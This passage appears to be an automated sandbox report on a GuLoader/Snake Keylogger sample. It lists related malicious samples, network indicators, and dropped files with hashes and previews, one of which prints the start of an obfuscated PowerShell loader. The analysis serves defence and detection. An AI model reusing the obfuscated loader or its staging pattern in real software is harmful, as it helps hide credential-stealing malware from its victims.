                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      ORACLE-BMC-31898USRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 193.122.130.0
                                                                                                                                                      ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 193.122.6.168
                                                                                                                                                      2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 158.101.44.242
                                                                                                                                                      TELEGRAMRURubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      CLOUDFLARENETUShttps://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 172.64.147.188
                                                                                                                                                      jd4t3R7hOq.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                      • 104.21.75.48
                                                                                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      Voicemail_+Transcription+_ATT006151.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.17.25.14
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 104.26.12.205
                                                                                                                                                      ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.28.65
                                                                                                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      • 104.21.48.233

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adRubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      v3tK92KcJV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eMqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161
                                                                                                                                                      Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      • 142.250.185.174
                                                                                                                                                      • 216.58.212.161

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\nsc9301.tmp\nsExec.dllSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                          Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  https://on-combine-data.s3.us-west-2.amazonaws.com/dealer-data/Share+Point/NTAS_MS3000X_Installer_v2.8.25_October2024_NO_UPS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    https://veryfast.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                      SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        SecuriteInfo.com.W32.PossibleThreat.20282.14864.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):53158
                                                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1119496
                                                                                                                                                                          Entropy (8bit):7.97281774973227
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:zNrNYogUzS7ZTdlfjS03VwV5k7j5awX300zQUGtZc:Z+JI2Jj3VwXgj5aEkHUGtZc
                                                                                                                                                                          MD5:487FAD16DA392C87FB894A6CCBD95870
                                                                                                                                                                          SHA1:16F4935CE6D245D535F23A1557B6F0E0AD77BAA9
                                                                                                                                                                          SHA-256:2BBB66A5BAD18E8CA2FEE4FEC0BFC6CE83B1CC4852D712C986685F095B3589CE
                                                                                                                                                                          SHA-512:BBB60D3E7A24964E100EA583BD701DBF1B1EBFFB44FD03DE5F6C096B87DE8DED04E7ECE05DD28995EB2BCDF1E3CDB1FCAA11078277CBA3B41AF1A5C4B8E04B59
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                          • Antivirus: Virustotal, Detection: 76%, Browse
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y...........................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Mangedoblende.exe:Zone.Identifier

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djc21z04.5wf.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0b3m0rc.z3i.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm03ocvi.w4w.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk1g3cpb.fw3.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):76789
                                                                                                                                                                          Entropy (8bit):5.1711478550234204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:nduKvzZUHmehtDIXEmuVcu5Cmb7T/7DM8wFJ/Ow06T8QJ0t1y:nEKvFUvhOCcu5Cm/7DTc5Ow9T85zy
                                                                                                                                                                          MD5:58B2D4D8DCB1F7505B049780AB782495
                                                                                                                                                                          SHA1:7781B3DC2DA3205C27020121A5083C1A5363751B
                                                                                                                                                                          SHA-256:FCA8D4A203B4456BD2DCC7D9D8901762199381CD6436D6DAFED510A94D173201
                                                                                                                                                                          SHA-512:52195930E588F773CBBAB36B758B66C161A9A09BE9EC20E96D390A64A30FF92C3B2C51675EFBD921379C9B06B6B3E250040AA3F9FACAE7F01DAFF3AB7AB71D11
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:$fiskehandlerens=$Dessertkirsebrs130;........$olivens = @'. intens.Pastelf$.ambetlfProduktoAb,olverCommendlBrak udgCre shi=Deltoid$RedressfSnuffypr Knyaz eCryp esm Allerum Bod leesextumvdT,nuscifFrugtbaj Tolvaae.dviklinTexundedSelektit.astefulS ikkeri,vingplgNumer shImperfeesta fstd rongdo;sofabor.SoundprfSigtemeuStangsinC.elomac Chado,tUvenskaiEsmakk.oE.dogennParat r BelknapKIaobs re KonomapMerduril avstste Rundpirsekunda Chillba( Bu lyi$ Ba nerAOmkartenPowspregSubsidiiUn echaoTo.sionc SproghaGratularDe.agerdFakul ei Imm,xio SnuffegOvervurrMatriloaAfstr bpFullishh Afsnrii Hasheecn vurde,afskriv$OliemalS diskotpLatomytaHeteropg Brobuea IsocoltTopske.)Evolvu Fisker{Af.nits.T.ansfo.Spisebo$BortvisUMiri anrBiciliahS.spendaDigladinUeueteoeBrugtvo Vive rk(EvacuatBTakstsdeUndersufEnomotarmobil siRatificeUrinblrlbronchosForanaleBekkasis eniorakdegraderDagbgeri .ndlingUdvi lieChlord.nTop emm Transce' D ossePGorserarBagtaleeMilieu d Ld eraiwind,ess responpFordrve$Retfrd bSpillerrMellemra Bet

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Countermeasure.Afs

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):334468
                                                                                                                                                                          Entropy (8bit):7.603197899322113
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:K6rLZieMT4Byx7aUZMkLaQk1xQ8SCevoorLhWofAFIwiCasj:K6rvMT1NLLaJ7oprFGFIwi7y
                                                                                                                                                                          MD5:906FDDEA67F3FCAF133C8A5FA43BC4E7
                                                                                                                                                                          SHA1:1CB2E0442D83A8B638BF2812662C1D2A0399521F
                                                                                                                                                                          SHA-256:5E4C3E81328F09A96778F6B07CFDE424E0A7B553B59B2C815C2A725CBD73C4C4
                                                                                                                                                                          SHA-512:23BA6C3286149578367FFB1AF0F3D51046F7AFB972D5507C99DD47D7859664DF624BFA17BC5FB0317084643FD325DA1DFCD996A2465AE34A1A1840599DD06C78
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..].g...=.....NNN.MM..^..... ..GGGG......???.........................hhhhh.222.....>>...>>>.ii.......,,........T..........@@.................WWWW...........r.......=.................E.++..........?????..Q....................YY.................?.}}}}........%..................`.............mm................k..%%%..................[[[.....................?.C...................................L....$$$..L.......55...............$$$$..^^..........~~..%%%........DD.pp....!.s.....6.....9.....p........j..........ggg.....................ii..................P...........n.....L.bbb...........................iii.................==...........{.....ttt._...5555.+...g.....M..sss..................z...???.....!.......ll.....m..............e...............................`...x..v................L......,,.............................P....#........z.c.++....?..............M..............qqqq.........K..FF.d..BB.777.......=........8..'.e.................."""........................u............QQQ......

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Kostbare.tes

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5657071
                                                                                                                                                                          Entropy (8bit):0.15928467329934035
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
                                                                                                                                                                          MD5:7FD6A7B5493B8D6659842CBDAC26F759
                                                                                                                                                                          SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
                                                                                                                                                                          SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
                                                                                                                                                                          SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:............................................n..............S.......................................................................................................................................................................q...............................................................................................................................................................................................................................................................................................................................................................................................z.............................................................................................................................................................................................................................4..q...................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Phylogenetically.del

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):108656
                                                                                                                                                                          Entropy (8bit):0.1629399370348107
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
                                                                                                                                                                          MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
                                                                                                                                                                          SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
                                                                                                                                                                          SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
                                                                                                                                                                          SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:............................................................................................................................................................................................................._....................................................................................................................................................................................................................................................................................................................................................................................)...........................................................<.......................................................................i.........................................................................................................................................................................................).......................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\backwashed.car

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6429709
                                                                                                                                                                          Entropy (8bit):0.15806775405645646
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
                                                                                                                                                                          MD5:F4FF9F83B617854EAA4804F4499C7538
                                                                                                                                                                          SHA1:C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
                                                                                                                                                                          SHA-256:AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
                                                                                                                                                                          SHA-512:2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...............................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................Q.....................................................................................................................................................................................................................................................................................................................................................................................................................Y........................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\indholdsfortegnelsen.mic

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7637195
                                                                                                                                                                          Entropy (8bit):0.1584950093042192
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
